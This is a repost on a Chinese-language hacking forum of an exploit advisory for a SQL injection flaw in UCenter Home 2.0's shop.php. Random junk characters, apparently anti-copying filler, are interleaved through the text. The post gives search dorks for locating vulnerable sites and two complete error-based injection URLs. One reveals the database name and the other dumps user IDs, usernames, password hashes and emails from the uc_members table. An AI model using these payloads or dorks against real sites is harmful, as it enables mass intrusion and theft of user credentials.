找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2014|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

; |' A) W! y- d  W3 T. s3 O__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
* U. g8 `  {0 a4 n' D3 c8 H
; `8 p3 q* M7 N7 Y+ m                                 
+ o/ F: R+ K2 i- c! P
: L4 a# [  w' ?' L& ^*/ Author : KnocKout  8 ?: u/ W' W4 S& _. O3 w  u- p5 a

& |3 l: ]& N1 r* [. U9 m*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
; F6 r; Y5 ^8 g$ y( W- F- r- Q- J9 Q8 Z% _
*/ Contact: knockoutr@msn.com  # F0 q9 ]( a& ~- c, ?4 ?5 F4 p

- C# R$ i4 Q  s+ C2 k4 Z4 Q*/ Cyber-Warrior.org/CWKnocKout  1 v: J' t& U- \0 i# U& l

# O1 o' y: W& L& n0 j__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  5 c) U7 m: r1 N% |

: g! w7 b& W7 a+ FScript : UCenter Home  
" T. u8 R( p0 `( q
( E6 `' Y, }7 r# ]5 ~Version : 2.0  : v/ e+ ~! F3 u  @! V+ U8 H
* Y3 ]$ y& c8 Y+ X" e
Script HomePage : http://u.discuz.net/  3 _7 n1 O# q$ w9 v! F. W

2 a6 j/ ]& T2 I" ~7 c__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
5 v1 P; O7 e, A+ o. ?" i. X/ }7 E9 d% i# Z6 }) x
Dork : Powered by UCenter inurl:shop.php?ac=view  
/ W' |& C( v" C( S" Z
. ]- N/ |( L) O5 q. N# zDork 2 : inurl:shop.php?ac=view&shopid=  
. p6 C4 _! [" y1 C+ e9 c. k9 U3 N+ D/ o& Q0 j( D: y# t& ]$ @4 ]1 M, V
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
' L3 A$ l) C/ f: g2 u
& `2 j! s, h  c4 n1 Z0 bVuln file : Shop.php  & x, j9 {  Z* b

, u  L0 i2 ?$ d. S  Vvalue's : (?)ac=view&shopid=  * n" b' L' {+ {: T; X8 j# o

0 t( b4 e' g+ ]9 _  W5 sVulnerable Style : SQL Injection (MySQL Error Based)  
, M/ @/ X; A8 U( n) F, t; O) t4 J0 b
Need Metarials : Hex Conversion  
$ o/ R4 a' ~* }+ e8 i8 n3 `
1 L, I! d& J9 r# v2 m3 ?: x__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
$ O: i' K1 A! n& a+ m+ \
- b; I6 Z7 I4 r5 AYour Need victim Database name.   
- T& }! v7 O* Q) h+ L' I; \0 x2 L% `( ~7 R
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
1 G# m" z2 o' X# @& W- M: q
3 Y  J, Y& P5 `4 B2 l..  
. i- P6 A2 Z/ g" r9 O5 H
' k1 t, P5 r4 V: |DB : Okey.  ( m$ A  @$ i9 g+ v) s

1 }' h9 l, j# a3 @your edit DB `[TARGET DB NAME]`  
/ G3 a7 S: o! @, r; r7 d5 N5 @! ~
Example : 'hiwir1_ucenter'  
+ s5 t* b: C8 O* l) b1 d* e
& f  V. n* Z- i: V/ a8 HEdit : Okey.  
! Z2 |7 }/ C0 m7 Q* w3 |' ]5 V& V# R' m/ ^$ h# w& T+ E$ }. x% H
Your use Hex conversion. And edit Your SQL Injection Exploit..  . Q6 x; b8 s$ h2 ]0 z- p

4 Z2 X+ {5 r) C, T$ K+ p1 T4 V% m   6 T: a0 t; h8 Y% s& K$ [( X4 R: N( G

( u3 g6 q+ j- f5 ]Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  4 q" l% r/ Q  A1 B6 B% J  I/ j! E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表